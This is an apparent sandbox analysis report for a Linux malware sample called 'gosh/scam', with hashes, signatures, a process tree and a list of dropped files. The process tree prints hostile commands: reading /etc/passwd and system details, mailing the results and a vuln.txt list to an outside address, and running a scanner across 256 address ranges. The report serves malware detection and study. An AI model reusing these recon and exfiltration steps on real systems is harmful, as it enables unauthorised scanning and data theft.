3c8d82009cfdecc57c0dd6ce42bdaef5df6142c1f949dc7616641fc876619382

Analysis

max time kernel
57s
max time network
57s
platform
debian-9_mips
resource
debian9-mipsbe-20231215-en
resource tags

arch:mipsimage:debian9-mipsbe-20231215-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
22/12/2023, 03:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

gosh/scam
Size

4KB
MD5

fc457f091269f8303f5499043a655c24
SHA1

cb8be781eb141222fe1f617911b6e89f40ecab06
SHA256

c574d640d3e80fdc76992c4b872b7a3768a7dc54213cf49c0cc6b6c47608cfc3
SHA512

770bce5e962feaede5800aa27e3dad89ee364eccb5aa4f01ad2c8bec6fcc32a27b16ea4833911b768c24d939fdb4fac7cb8af4dd7b204e975fafa2d427d5b092
SSDEEP

96:Fymtc3nmUyp8zW9wnqoZpIS2baUrKhI/uVcTR6bEkIev45CC5MDmNA36Rnw9Wz8Z:S35eNbWf

Score

6^/10

Malware Config

Signatures

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 5 IoCs

System Information Discovery

T1082

description	ioc	Process
File opened for reading	/sys/devices/system/cpu/online	uptime
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4
File opened for reading	/sys/devices/system/cpu/online	exim4

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/151/stat	killall
File opened for reading	/proc/356/stat	killall
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/17/stat	killall
File opened for reading	/proc/19/stat	killall
File opened for reading	/proc/36/stat	killall
File opened for reading	/proc/77/stat	killall
File opened for reading	/proc/112/stat	killall
File opened for reading	/proc/1039/cmdline	killall
File opened for reading	/proc/20/stat	killall
File opened for reading	/proc/72/stat	killall
File opened for reading	/proc/78/stat	killall
File opened for reading	/proc/84/stat	killall
File opened for reading	/proc/175/stat	killall
File opened for reading	/proc/707/stat	killall
File opened for reading	/proc/731/stat	killall
File opened for reading	/proc/37/stat	killall
File opened for reading	/proc/572/stat	killall
File opened for reading	/proc/326/stat	killall
File opened for reading	/proc/571/stat	killall
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/self/mountinfo	df
File opened for reading	/proc/filesystems	killall
File opened for reading	/proc/12/stat	killall
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/70/stat	killall
File opened for reading	/proc/1054/stat	killall
File opened for reading	/proc/4/stat	killall
File opened for reading	/proc/71/stat	killall
File opened for reading	/proc/236/stat	killall
File opened for reading	/proc/1043/stat	killall
File opened for reading	/proc/1051/stat	killall
File opened for reading	/proc/69/stat	killall
File opened for reading	/proc/123/stat	killall
File opened for reading	/proc/sys/kernel/ngroups_max	exim4
File opened for reading	/proc/3/stat	killall
File opened for reading	/proc/5/stat	killall
File opened for reading	/proc/16/stat	killall
File opened for reading	/proc/21/stat	killall
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/151/cmdline	killall
File opened for reading	/proc/352/stat	killall
File opened for reading	/proc/705/stat	killall
File opened for reading	/proc/1043/cmdline	killall
File opened for reading	/proc/sys/kernel/ngroups_max	exim4
File opened for reading	/proc/sys/kernel/ngroups_max	id
File opened for reading	/proc/sys/kernel/ngroups_max	sendmail
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/82/stat	killall
File opened for reading	/proc/158/stat	killall
File opened for reading	/proc/loadavg	uptime
File opened for reading	/proc/2/stat	killall
File opened for reading	/proc/1039/stat	killall
File opened for reading	/proc/7/stat	killall
File opened for reading	/proc/122/stat	killall
File opened for reading	/proc/730/stat	killall
File opened for reading	/proc/405/stat	killall
File opened for reading	/proc/688/stat	killall
File opened for reading	/proc/sys/kernel/osrelease	uptime
File opened for reading	/proc/11/stat	killall
File opened for reading	/proc/13/stat	killall
File opened for reading	/proc/14/stat	killall
File opened for reading	/proc/74/stat	killall
File opened for reading	/proc/75/stat	killall

Writes file to tmp directory 6 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/muCoNfN9	mail
File opened for modification	/tmp/muc1S3Ab	mail
File opened for modification	/tmp/muqfqkUT	mail
File opened for modification	/tmp/muxdFGZb	mail
File opened for modification	/tmp/gosh/info2	scam
File opened for modification	/tmp/gosh/info2	Process not Found

/tmp/gosh/scam
/tmp/gosh/scam
1⤵
- Writes file to tmp directory
PID:730
- /sbin/ifconfig
  /sbin/ifconfig -a
  2⤵
  PID:736
- /usr/bin/uptime
  uptime
  2⤵
  - Reads CPU attributes
  - Reads runtime system information
  PID:737
- /bin/uname
  uname -a
  2⤵
  PID:738
- /bin/cat
  cat /etc/issue
  2⤵
  PID:739
- /bin/cat
  cat /etc/passwd
  2⤵
  PID:740
- /usr/bin/id
  id
  2⤵
  - Reads runtime system information
  PID:742
- /bin/df
  df -h
  2⤵
  - Reads runtime system information
  PID:743
- /bin/cat
  cat info2
  2⤵
  PID:744
- /usr/bin/mail
  mail -s "Scanner MaLa Port : ?? | Pass : stii tu :))" "[email protected]"
  2⤵
  - Writes file to tmp directory
  PID:745
- - /usr/sbin/sendmail
    /usr/sbin/sendmail -oi -f "root@debian9-mipsbe-20231215-en-12" -t
    3⤵
    PID:746
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1rGZ32-0000C2-0Z
      4⤵
      Reads CPU attributes
      PID:747
    - - /usr/sbin/exim4
        
        /usr/sbin/exim4 -t -oem -oi -f "<>" -E1rGZ32-0000C2-0Z
        5⤵
        Reads runtime system information
        
        PID:756
      - /usr/sbin/exim4
        
        /usr/sbin/exim4 -Mc 1rGZ39-0000CC-UI
        6⤵
        Reads CPU attributes
        
        PID:837
- /bin/rm
  rm -rf info2
  2⤵
  PID:748
- /usr/bin/clear
  clear
  2⤵
  PID:749
- /tmp/gosh/a
  ./a .0
  2⤵
  PID:750
- /tmp/gosh/a
  ./a .1
  2⤵
  PID:751
- /tmp/gosh/a
  ./a .2
  2⤵
  PID:752
- /tmp/gosh/a
  ./a .3
  2⤵
  PID:753
- /tmp/gosh/a
  ./a .4
  2⤵
  PID:754
- /tmp/gosh/a
  ./a .5
  2⤵
  PID:755
- /tmp/gosh/a
  ./a .6
  2⤵
  PID:757
- /tmp/gosh/a
  ./a .7
  2⤵
  PID:758
- /tmp/gosh/a
  ./a .8
  2⤵
  PID:759
- /tmp/gosh/a
  ./a .9
  2⤵
  PID:760
- /tmp/gosh/a
  ./a .10
  2⤵
  PID:761
- /tmp/gosh/a
  ./a .11
  2⤵
  PID:762
- /tmp/gosh/a
  ./a .12
  2⤵
  PID:763
- /tmp/gosh/a
  ./a .13
  2⤵
  PID:764
- /tmp/gosh/a
  ./a .14
  2⤵
  PID:765
- /tmp/gosh/a
  ./a .15
  2⤵
  PID:766
- /tmp/gosh/a
  ./a .16
  2⤵
  PID:767
- /tmp/gosh/a
  ./a .17
  2⤵
  PID:768
- /tmp/gosh/a
  ./a .18
  2⤵
  PID:769
- /tmp/gosh/a
  ./a .19
  2⤵
  PID:770
- /tmp/gosh/a
  ./a .20
  2⤵
  PID:771
- /tmp/gosh/a
  ./a .21
  2⤵
  PID:772
- /tmp/gosh/a
  ./a .22
  2⤵
  PID:773
- /tmp/gosh/a
  ./a .23
  2⤵
  PID:774
- /tmp/gosh/a
  ./a .24
  2⤵
  PID:775
- /tmp/gosh/a
  ./a .25
  2⤵
  PID:776
- /tmp/gosh/a
  ./a .26
  2⤵
  PID:777
- /tmp/gosh/a
  ./a .27
  2⤵
  PID:778
- /tmp/gosh/a
  ./a .28
  2⤵
  PID:779
- /tmp/gosh/a
  ./a .29
  2⤵
  PID:780
- /tmp/gosh/a
  ./a .30
  2⤵
  PID:781
- /tmp/gosh/a
  ./a .31
  2⤵
  PID:782
- /tmp/gosh/a
  ./a .32
  2⤵
  PID:783
- /tmp/gosh/a
  ./a .33
  2⤵
  PID:784
- /tmp/gosh/a
  ./a .34
  2⤵
  PID:785
- /tmp/gosh/a
  ./a .35
  2⤵
  PID:786
- /tmp/gosh/a
  ./a .36
  2⤵
  PID:787
- /tmp/gosh/a
  ./a .37
  2⤵
  PID:788
- /tmp/gosh/a
  ./a .38
  2⤵
  PID:789
- /tmp/gosh/a
  ./a .39
  2⤵
  PID:790
- /tmp/gosh/a
  ./a .40
  2⤵
  PID:791
- /tmp/gosh/a
  ./a .41
  2⤵
  PID:792
- /tmp/gosh/a
  ./a .42
  2⤵
  PID:793
- /tmp/gosh/a
  ./a .43
  2⤵
  PID:794
- /tmp/gosh/a
  ./a .44
  2⤵
  PID:795
- /tmp/gosh/a
  ./a .45
  2⤵
  PID:796
- /tmp/gosh/a
  ./a .46
  2⤵
  PID:797
- /tmp/gosh/a
  ./a .47
  2⤵
  PID:798
- /tmp/gosh/a
  ./a .48
  2⤵
  PID:799
- /tmp/gosh/a
  ./a .49
  2⤵
  PID:800
- /tmp/gosh/a
  ./a .50
  2⤵
  PID:801
- /tmp/gosh/a
  ./a .51
  2⤵
  PID:802
- /tmp/gosh/a
  ./a .52
  2⤵
  PID:803
- /tmp/gosh/a
  ./a .53
  2⤵
  PID:804
- /tmp/gosh/a
  ./a .54
  2⤵
  PID:805
- /tmp/gosh/a
  ./a .55
  2⤵
  PID:806
- /tmp/gosh/a
  ./a .56
  2⤵
  PID:807
- /tmp/gosh/a
  ./a .57
  2⤵
  PID:808
- /tmp/gosh/a
  ./a .58
  2⤵
  PID:809
- /tmp/gosh/a
  ./a .59
  2⤵
  PID:810
- /tmp/gosh/a
  ./a .60
  2⤵
  PID:811
- /tmp/gosh/a
  ./a .61
  2⤵
  PID:812
- /tmp/gosh/a
  ./a .62
  2⤵
  PID:813
- /tmp/gosh/a
  ./a .63
  2⤵
  PID:814
- /tmp/gosh/a
  ./a .64
  2⤵
  PID:815
- /tmp/gosh/a
  ./a .65
  2⤵
  PID:816
- /tmp/gosh/a
  ./a .66
  2⤵
  PID:817
- /tmp/gosh/a
  ./a .67
  2⤵
  PID:818
- /tmp/gosh/a
  ./a .68
  2⤵
  PID:819
- /tmp/gosh/a
  ./a .69
  2⤵
  PID:820
- /tmp/gosh/a
  ./a .70
  2⤵
  PID:821
- /tmp/gosh/a
  ./a .71
  2⤵
  PID:822
- /tmp/gosh/a
  ./a .72
  2⤵
  PID:823
- /tmp/gosh/a
  ./a .73
  2⤵
  PID:824
- /tmp/gosh/a
  ./a .74
  2⤵
  PID:825
- /tmp/gosh/a
  ./a .75
  2⤵
  PID:826
- /tmp/gosh/a
  ./a .76
  2⤵
  PID:827
- /tmp/gosh/a
  ./a .77
  2⤵
  PID:828
- /tmp/gosh/a
  ./a .78
  2⤵
  PID:829
- /tmp/gosh/a
  ./a .79
  2⤵
  PID:830
- /tmp/gosh/a
  ./a .80
  2⤵
  PID:831
- /tmp/gosh/a
  ./a .81
  2⤵
  PID:832
- /tmp/gosh/a
  ./a .82
  2⤵
  PID:833
- /tmp/gosh/a
  ./a .83
  2⤵
  PID:834
- /tmp/gosh/a
  ./a .84
  2⤵
  PID:835
- /tmp/gosh/a
  ./a .85
  2⤵
  PID:836
- /tmp/gosh/a
  ./a .86
  2⤵
  PID:838
- /tmp/gosh/a
  ./a .87
  2⤵
  PID:839
- /tmp/gosh/a
  ./a .88
  2⤵
  PID:840
- /tmp/gosh/a
  ./a .89
  2⤵
  PID:841
- /tmp/gosh/a
  ./a .90
  2⤵
  PID:842
- /tmp/gosh/a
  ./a .91
  2⤵
  PID:843
- /tmp/gosh/a
  ./a .92
  2⤵
  PID:844
- /tmp/gosh/a
  ./a .93
  2⤵
  PID:845
- /tmp/gosh/a
  ./a .94
  2⤵
  PID:846
- /tmp/gosh/a
  ./a .95
  2⤵
  PID:847
- /tmp/gosh/a
  ./a .96
  2⤵
  PID:848
- /tmp/gosh/a
  ./a .97
  2⤵
  PID:849
- /tmp/gosh/a
  ./a .98
  2⤵
  PID:850
- /tmp/gosh/a
  ./a .99
  2⤵
  PID:851
- /tmp/gosh/a
  ./a .100
  2⤵
  PID:852
- /tmp/gosh/a
  ./a .101
  2⤵
  PID:853
- /tmp/gosh/a
  ./a .102
  2⤵
  PID:854
- /tmp/gosh/a
  ./a .103
  2⤵
  PID:855
- /tmp/gosh/a
  ./a .104
  2⤵
  PID:856
- /tmp/gosh/a
  ./a .105
  2⤵
  PID:857
- /tmp/gosh/a
  ./a .106
  2⤵
  PID:858
- /tmp/gosh/a
  ./a .107
  2⤵
  PID:859
- /tmp/gosh/a
  ./a .108
  2⤵
  PID:860
- /tmp/gosh/a
  ./a .109
  2⤵
  PID:861
- /tmp/gosh/a
  ./a .110
  2⤵
  PID:862
- /tmp/gosh/a
  ./a .111
  2⤵
  PID:863
- /tmp/gosh/a
  ./a .112
  2⤵
  PID:864
- /tmp/gosh/a
  ./a .113
  2⤵
  PID:865
- /tmp/gosh/a
  ./a .114
  2⤵
  PID:866
- /tmp/gosh/a
  ./a .115
  2⤵
  PID:867
- /tmp/gosh/a
  ./a .116
  2⤵
  PID:869
- /tmp/gosh/a
  ./a .117
  2⤵
  PID:870
- /tmp/gosh/a
  ./a .118
  2⤵
  PID:871
- /tmp/gosh/a
  ./a .119
  2⤵
  PID:872
- /tmp/gosh/a
  ./a .120
  2⤵
  PID:873
- /tmp/gosh/a
  ./a .121
  2⤵
  PID:874
- /tmp/gosh/a
  ./a .122
  2⤵
  PID:875
- /tmp/gosh/a
  ./a .123
  2⤵
  PID:876
- /tmp/gosh/a
  ./a .124
  2⤵
  PID:877
- /tmp/gosh/a
  ./a .125
  2⤵
  PID:878
- /tmp/gosh/a
  ./a .126
  2⤵
  PID:879
- /tmp/gosh/a
  ./a .127
  2⤵
  PID:880
- /tmp/gosh/a
  ./a .128
  2⤵
  PID:881
- /tmp/gosh/a
  ./a .129
  2⤵
  PID:882
- /tmp/gosh/a
  ./a .130
  2⤵
  PID:884
- /tmp/gosh/a
  ./a .131
  2⤵
  PID:885
- /tmp/gosh/a
  ./a .132
  2⤵
  PID:887
- /tmp/gosh/a
  ./a .133
  2⤵
  PID:888
- /tmp/gosh/a
  ./a .134
  2⤵
  PID:889
- /tmp/gosh/a
  ./a .135
  2⤵
  PID:890
- /tmp/gosh/a
  ./a .136
  2⤵
  PID:891
- /tmp/gosh/a
  ./a .137
  2⤵
  PID:892
- /tmp/gosh/a
  ./a .138
  2⤵
  PID:893
- /tmp/gosh/a
  ./a .139
  2⤵
  PID:894
- /tmp/gosh/a
  ./a .140
  2⤵
  PID:895
- /tmp/gosh/a
  ./a .141
  2⤵
  PID:896
- /tmp/gosh/a
  ./a .142
  2⤵
  PID:897
- /tmp/gosh/a
  ./a .143
  2⤵
  PID:899
- /tmp/gosh/a
  ./a .144
  2⤵
  PID:900
- /tmp/gosh/a
  ./a .145
  2⤵
  PID:901
- /tmp/gosh/a
  ./a .146
  2⤵
  PID:902
- /tmp/gosh/a
  ./a .147
  2⤵
  PID:904
- /tmp/gosh/a
  ./a .148
  2⤵
  PID:905
- /tmp/gosh/a
  ./a .149
  2⤵
  PID:906
- /tmp/gosh/a
  ./a .150
  2⤵
  PID:907
- /tmp/gosh/a
  ./a .151
  2⤵
  PID:908
- /tmp/gosh/a
  ./a .152
  2⤵
  PID:909
- /tmp/gosh/a
  ./a .153
  2⤵
  PID:910
- /tmp/gosh/a
  ./a .154
  2⤵
  PID:911
- /tmp/gosh/a
  ./a .155
  2⤵
  PID:912
- /tmp/gosh/a
  ./a .156
  2⤵
  PID:913
- /tmp/gosh/a
  ./a .157
  2⤵
  PID:915
- /tmp/gosh/a
  ./a .158
  2⤵
  PID:916
- /tmp/gosh/a
  ./a .159
  2⤵
  PID:917
- /tmp/gosh/a
  ./a .160
  2⤵
  PID:918
- /tmp/gosh/a
  ./a .161
  2⤵
  PID:920
- /tmp/gosh/a
  ./a .162
  2⤵
  PID:924
- /tmp/gosh/a
  ./a .163
  2⤵
  PID:925
- /tmp/gosh/a
  ./a .164
  2⤵
  PID:926
- /tmp/gosh/a
  ./a .165
  2⤵
  PID:927
- /tmp/gosh/a
  ./a .166
  2⤵
  PID:928
- /tmp/gosh/a
  ./a .167
  2⤵
  PID:929
- /tmp/gosh/a
  ./a .168
  2⤵
  PID:930
- /tmp/gosh/a
  ./a .169
  2⤵
  PID:931
- /tmp/gosh/a
  ./a .170
  2⤵
  PID:932
- /tmp/gosh/a
  ./a .171
  2⤵
  PID:933
- /tmp/gosh/a
  ./a .172
  2⤵
  PID:935
- /tmp/gosh/a
  ./a .173
  2⤵
  PID:936
- /tmp/gosh/a
  ./a .174
  2⤵
  PID:937
- /tmp/gosh/a
  ./a .175
  2⤵
  PID:938
- /tmp/gosh/a
  ./a .176
  2⤵
  PID:940
- /tmp/gosh/a
  ./a .177
  2⤵
  PID:941
- /tmp/gosh/a
  ./a .178
  2⤵
  PID:942
- /tmp/gosh/a
  ./a .179
  2⤵
  PID:943
- /tmp/gosh/a
  ./a .180
  2⤵
  PID:944
- /tmp/gosh/a
  ./a .181
  2⤵
  PID:945
- /tmp/gosh/a
  ./a .182
  2⤵
  PID:946
- /tmp/gosh/a
  ./a .183
  2⤵
  PID:947
- /tmp/gosh/a
  ./a .184
  2⤵
  PID:948
- /tmp/gosh/a
  ./a .185
  2⤵
  PID:949
- /tmp/gosh/a
  ./a .186
  2⤵
  PID:950
- /tmp/gosh/a
  ./a .187
  2⤵
  PID:952
- /tmp/gosh/a
  ./a .188
  2⤵
  PID:953
- /tmp/gosh/a
  ./a .189
  2⤵
  PID:954
- /tmp/gosh/a
  ./a .190
  2⤵
  PID:956
- /tmp/gosh/a
  ./a .191
  2⤵
  PID:957
- /tmp/gosh/a
  ./a .192
  2⤵
  PID:958
- /tmp/gosh/a
  ./a .193
  2⤵
  PID:959
- /tmp/gosh/a
  ./a .194
  2⤵
  PID:960
- /tmp/gosh/a
  ./a .195
  2⤵
  PID:961
- /tmp/gosh/a
  ./a .196
  2⤵
  PID:962
- /tmp/gosh/a
  ./a .197
  2⤵
  PID:963
- /tmp/gosh/a
  ./a .198
  2⤵
  PID:964
- /tmp/gosh/a
  ./a .199
  2⤵
  PID:965
- /tmp/gosh/a
  ./a .200
  2⤵
  PID:967
- /tmp/gosh/a
  ./a .201
  2⤵
  PID:968
- /tmp/gosh/a
  ./a .202
  2⤵
  PID:969
- /tmp/gosh/a
  ./a .203
  2⤵
  PID:970
- /tmp/gosh/a
  ./a .204
  2⤵
  PID:972
- /tmp/gosh/a
  ./a .205
  2⤵
  PID:973
- /tmp/gosh/a
  ./a .206
  2⤵
  PID:974
- /tmp/gosh/a
  ./a .207
  2⤵
  PID:975
- /tmp/gosh/a
  ./a .208
  2⤵
  PID:976
- /tmp/gosh/a
  ./a .209
  2⤵
  PID:977
- /tmp/gosh/a
  ./a .210
  2⤵
  PID:978
- /tmp/gosh/a
  ./a .211
  2⤵
  PID:979
- /tmp/gosh/a
  ./a .212
  2⤵
  PID:980
- /tmp/gosh/a
  ./a .213
  2⤵
  PID:981
- /tmp/gosh/a
  ./a .214
  2⤵
  PID:983
- /tmp/gosh/a
  ./a .215
  2⤵
  PID:984
- /tmp/gosh/a
  ./a .216
  2⤵
  PID:985
- /tmp/gosh/a
  ./a .217
  2⤵
  PID:986
- /tmp/gosh/a
  ./a .218
  2⤵
  PID:987
- /tmp/gosh/a
  ./a .219
  2⤵
  PID:989
- /tmp/gosh/a
  ./a .220
  2⤵
  PID:990
- /tmp/gosh/a
  ./a .221
  2⤵
  PID:991
- /tmp/gosh/a
  ./a .222
  2⤵
  PID:992
- /tmp/gosh/a
  ./a .223
  2⤵
  PID:993
- /tmp/gosh/a
  ./a .224
  2⤵
  PID:994
- /tmp/gosh/a
  ./a .225
  2⤵
  PID:995
- /tmp/gosh/a
  ./a .226
  2⤵
  PID:996
- /tmp/gosh/a
  ./a .227
  2⤵
  PID:997
- /tmp/gosh/a
  ./a .228
  2⤵
  PID:998
- /tmp/gosh/a
  ./a .229
  2⤵
  PID:1000
- /tmp/gosh/a
  ./a .230
  2⤵
  PID:1001
- /tmp/gosh/a
  ./a .231
  2⤵
  PID:1002
- /tmp/gosh/a
  ./a .232
  2⤵
  PID:1003
- /tmp/gosh/a
  ./a .233
  2⤵
  PID:1004
- /tmp/gosh/a
  ./a .234
  2⤵
  PID:1006
- /tmp/gosh/a
  ./a .235
  2⤵
  PID:1007
- /tmp/gosh/a
  ./a .236
  2⤵
  PID:1008
- /tmp/gosh/a
  ./a .237
  2⤵
  PID:1009
- /tmp/gosh/a
  ./a .238
  2⤵
  PID:1010
- /tmp/gosh/a
  ./a .239
  2⤵
  PID:1011
- /tmp/gosh/a
  ./a .240
  2⤵
  PID:1012
- /tmp/gosh/a
  ./a .241
  2⤵
  PID:1013
- /tmp/gosh/a
  ./a .242
  2⤵
  PID:1014
- /tmp/gosh/a
  ./a .243
  2⤵
  PID:1015
- /tmp/gosh/a
  ./a .244
  2⤵
  PID:1016
- /tmp/gosh/a
  ./a .245
  2⤵
  PID:1018
- /tmp/gosh/a
  ./a .246
  2⤵
  PID:1019
- /tmp/gosh/a
  ./a .247
  2⤵
  PID:1020
- /tmp/gosh/a
  ./a .248
  2⤵
  PID:1021
- /tmp/gosh/a
  ./a .249
  2⤵
  PID:1023
- /bin/cat
  cat vuln.txt
  2⤵
  PID:1024
- /usr/bin/mail
  mail -s gosh "[email protected]"
  2⤵
  - Writes file to tmp directory
  PID:1025
- - /usr/sbin/sendmail
    /usr/sbin/sendmail -oi -f "root@debian9-mipsbe-20231215-en-12" -t
    3⤵
    - Reads runtime system information
    PID:1028
  - - /usr/sbin/exim4
      /usr/sbin/exim4 -Mc 1rGZ3N-0000Ga-Ki
      4⤵
      Reads CPU attributes
      PID:1054
    - - /usr/sbin/exim4
        
        /usr/sbin/exim4 -t -oem -oi -f "<>" -E1rGZ3N-0000Ga-Ki
        5⤵
        Reads runtime system information
        
        PID:1062
      - /usr/sbin/exim4
        
        /usr/sbin/exim4 -Mc 1rGZ3W-0000H8-P6
        6⤵
        Reads CPU attributes
        
        PID:1093
- /tmp/gosh/a
  ./a .250
  2⤵
  PID:1055
- /tmp/gosh/a
  ./a .251
  2⤵
  PID:1056
- /tmp/gosh/a
  ./a .252
  2⤵
  PID:1057
- /tmp/gosh/a
  ./a .253
  2⤵
  PID:1058
- /tmp/gosh/a
  ./a .254
  2⤵
  PID:1059
- /tmp/gosh/a
  ./a .255
  2⤵
  PID:1060
- /usr/bin/killall
  killall -9 a
  2⤵
  - Reads runtime system information
  PID:1061

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/gosh/info2

Filesize
27B

MD5
176cc35a4c2033f0b8415b228e43ef9a

SHA1
fea20e6170240e12abb1969a72dd2160b5bbeffe

SHA256
879af0d43308e769dd98b058c70139debaf32cec4e38468e2b70a594ca07126c

SHA512
a14f93dae504c3af640dcded90b7055643eb45f16a4b9a0eeadde3027b8eed5039b66e80a0162642c43903cdc1e57f9b37dc69990b737df8be8a48ae166d7d8f

Download Submit
/tmp/gosh/info2

Filesize
58B

MD5
5918e36a07ca38388c2c13f43cc1ba98

SHA1
69c6b025b6152166ef4bd9d6f089d3e11a330327

SHA256
e4406e7b27668619ca6862a415948a41f5750f44e1e65bb7c3e620b6531a1a70

SHA512
71a837652c629d66bdd3a7363c6949fd7d8b61e5ec7e300f1b4c393f4fa5a79bec463c7065da9889fa355cd0a12be9b8d809f95dc10b9df45cf1c82352589233

Download Submit
/tmp/gosh/info2

Filesize
120B

MD5
83db0df6bbd63de4df6380043501e06c

SHA1
99fa8d4aa64d83cee6a787600f2cd9fa862b4715

SHA256
983b009d8841bf5e4dbbcca1f22f2cafdfd180e96eb1a97cc04d6b95abc02264

SHA512
3283ee3b5d663c18c84521f73b63832f0de9dac940d403effdc4343dee32b635bfaa36f2752a4f049fed331e132973919ed0e1c8c483e73d4736284e6a0940ad

Download Submit
/tmp/gosh/info2

Filesize
256B

MD5
68043b2078bf2ce18d72370ec68820d1

SHA1
9bebf5d75ab3add3ef08d15ed4b5f55b3dcef02c

SHA256
3fddf9fea0792a2615336290fc1ae4b1f020b3f636568a0ca77c37ca30169fc0

SHA512
7f2dfc26673b64df4961926f82ad56bc8b332e82c9514a516b6c9db78f7faf0fb663c70063c3f34a1a4147aa4f0694d3378a88ffd28f6043ee356da0a8ea151f

Download Submit
/tmp/gosh/info2

Filesize
2KB

MD5
f08ea11139313a76093a16e56e2bcf76

SHA1
4b4f0699e619fd26d0fc2af8a528e183c6f24420

SHA256
1b0372d0226eeca440e6c2dc34c5ed9218a83c99d63771bb68b82259e306e6fe

SHA512
404ff039edd65c8c539bb01b87f9276a215df5a52ace860ee1aa4fe96ca86137523d616d7bf5563deaa3c765ac42edc694a5f283db8cf8fe29f272f417020849

Download Submit
/var/mail/user

Filesize
4KB

MD5
5fd71b55a7ae6eb2221059748e0ab80e

SHA1
8793ee6ccec0b0ee9d162803e844cfb91f302c39

SHA256
571783bb0a2336eb134dca5a537d8a210d5487e865f6ac6844546fbc66ebb9a8

SHA512
ff26fdca4574c45e38da573a01fab6965dc0dbee1e63a8dffe3514194ce6c744c132e4d3f2a30adba14254dcb15f18a06846aa0e0e1a8fc5422c4452b1656c20

Download Submit
/var/mail/user

Filesize
5KB

MD5
92099154604c1478ab95833dbb1b51b3

SHA1
e685fabe153b2520944c3a5483eb70b0bab46b5a

SHA256
6534ee17dcd6bc1b2fc047d2961d29ae0c6477e8294ee930cd6fb10329f3c741

SHA512
98bd41244eedd3de62a8bcdd656ed532f9d1e9ba34313fc77a2212ce2835c60a78e02777218ff675974a99ea9a1babf9432afb03e67441eb6c03636b67351e2d

Download Submit
/var/spool/exim4/input/1rGZ32-0000C2-0Z-D

Filesize
2KB

MD5
ddfff78d67fbeda67f4321e4c5fdceb5

SHA1
184a57a776b79d56e738119633e0c0ce48dd6c2b

SHA256
badbc5d8da76831de9103b3f0bde8b5f7af61b6053d357244c25c5ad00407147

SHA512
500d3ce1736cd58865386da565e0599d0d570c41192f7a3fb74b86e7cc28463d4711c64f95427324ab8a0c7e30f91cb7298a035afbd4e2a10a468df538f35752

Download Submit
/var/spool/exim4/input/1rGZ39-0000CC-UI-D

Filesize
3KB

MD5
ff08f3af77a06942c5c61ab30f7c9722

SHA1
c57fa819bae816db982d1f4861af1e5f8f709236

SHA256
08eee98fb9d17b8fc5b58c3c66041c6b48e87f52b40bc9cfcbfef5d8184abf5d

SHA512
cd2aac75ee39343320b15d5dd2ef345a44e7d04691081ac593074f78b40130350633d77a82e4c5aa6302949f3094f41024dab12c9ddb8ab68b69f5b5d3234f92

Download Submit
/var/spool/exim4/input/1rGZ39-0000CC-UI-J

Filesize
34B

MD5
d7d96d63d643a4ce3e408eba7dfcedc5

SHA1
c53607f95c5c57beafc1d8266646797a035f76ea

SHA256
21db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159

SHA512
703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3

Download Submit
/var/spool/exim4/input/1rGZ3N-0000Ga-Ki-D

Filesize
19B

MD5
61dd2ab83201d2a5e79b8cada8b25c4f

SHA1
1beb6bd9f815ae2cc7f0e83f4c8c92ddbc576baa

SHA256
9084fe48b7e0610f0512cbb52dc9dfc58e170ba50f1927b19ad9b2377e7e7d3d

SHA512
93f4c3facd6823af9e9089bbf396f7b3c322766a551acb5980f683ba1d52f9af534a8b66ddb54697703e21bdd6b0af0962d77aca685422d7520e43d333c5cf3c

Download Submit
/var/spool/exim4/input/1rGZ3W-0000H8-P6-D

Filesize
1KB

MD5
22bffb3dc2199d9376bd2b6474e70066

SHA1
ae38314cae22706cc7f4707274f9746e844446c5

SHA256
a8094bb23534cdc024804f5a448afbebc6343aeb1f1840fc743a2d3fbe9dd91d

SHA512
3ae5c6fb12040a995621ef72e1fc3ca833a6a93c6c82819d53e627b0c62d03cd0c811accf86401846ca32a553032d7937a722b2abf76e80468214d6e5e14685c

Download Submit
/var/spool/exim4/input/hdr.1028

Filesize
720B

MD5
3fdb5f55cc01ce5d6ef911d132bd4fe0

SHA1
4a8cfbd11fee8bae3911fdafc8b6af1791c9a722

SHA256
21e52142ba6fa034ae6008378961ab6824db5582db223a90098e8882158c4a41

SHA512
f02f11cc9c822ebbcde1903d956a89569aca5bcfb3350eb6f777d5c434e5d18ef3d8e6a197ed56fe25f810a31e61bb73a8a4175e6b8b679cc1e58f358f8a6015

Download Submit
/var/spool/exim4/input/hdr.1054

Filesize
739B

MD5
fa85bba5445c2c567b7ba7108e6af8df

SHA1
36e94e34416d15ba9839544c9ad4aec2489bc5d1

SHA256
98c23f37ac65a79fca98aad58dbe87bbee06d29a8150db55618a4f4c3aec24b8

SHA512
8d0152da6720e55c849611dad3a1cf2613f2736e100114de0cd030ef64d469fbab8216208898000ea8c850074a51b204893f3faa23832a26d84f5dab0ac6e869

Download Submit
/var/spool/exim4/input/hdr.1062

Filesize
957B

MD5
d9279138f3bf95175a1e84a28bf19b4d

SHA1
3be86c6dbba687c2f2a61a9dbd3801be056566b3

SHA256
41c622c4719b741dc06033acb195fa1ea503416c33284d7811bee2ce4aa4446d

SHA512
4a149aec2f6dd8a37f6ada5cb4d20ffdb172b2d43494e0af3d57384912ade62168010aae10694aa4bfd068d52bcbefd69765819e30e308b7e5e81193ac5f7039

Download Submit
